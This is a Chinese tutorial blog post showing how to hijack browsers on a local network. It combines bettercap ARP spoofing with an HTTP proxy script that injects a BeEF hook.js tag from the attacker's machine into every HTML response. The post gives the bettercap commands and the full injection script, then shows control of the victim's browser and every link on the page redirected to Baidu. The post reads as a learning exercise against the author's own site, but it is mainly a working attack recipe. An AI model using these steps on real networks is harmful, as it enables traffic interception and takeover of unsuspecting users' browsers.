欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

beef的简单使用–结合中间人攻击注入钩子

程序员文章站 2022-03-09 22:52:21
...

 

 

最近接触到了beef这款工具,看过基本教程后就自己进行了一次攻击尝试。

总体思路就是在内网下通过arp欺骗,修改response包,加入我们的钩子,十分简单。

首先是arp欺骗,这里用的是bettercap,可以参考我之前的文章。

开始arp欺骗:arp.spoof on

打开http代理:http.proxy on

下面我们要写一个js文件用于处理返回的response包,保存为in.js:

参考:https://github.com/bettercap/bettercap/wiki/http.modules

function onResponse(req, res) {
    if( res.ContentType.indexOf('text/html') == 0 ){
        var body = res.ReadBody();
        if( body.indexOf('</head>') != -1 ) {
            res.Body = body.replace( 
                '</head>', 
                '<script src="http://192.168.1.112:3000/hook.js">'+
                '</script>' +
                '</head>'
            ); 
        }
    }
}

这段代码就是在返回的html中的head部分加入

<script src=”http://192.168.1.112:3000/hook.js”>,
192.168.1.112是kali的内网地址

然后执行 set http.proxy.script /usr/in.js(js文件的位置)

现在在受害主机上打开一个http的网址即可,这里我用的是自己小网站
打开之后查看源码,可以看到已经成功注入:

beef的简单使用–结合中间人攻击注入钩子

再看beef这里的清况:

beef的简单使用–结合中间人攻击注入钩子

可以看到受害主机浏览器已被控制,

然后进行一个小操作吧,把受害主机当前页面的所有连接都改到百度:

beef的简单使用–结合中间人攻击注入钩子

这时在页面上点任何一个链接都会跳转到百度:

beef的简单使用–结合中间人攻击注入钩子

一个beef的教程:http://www.freebuf.com/articles/web/175755.html

文章同步到我的博客:http://www.zjzhhb.com/archives/498

转载联系我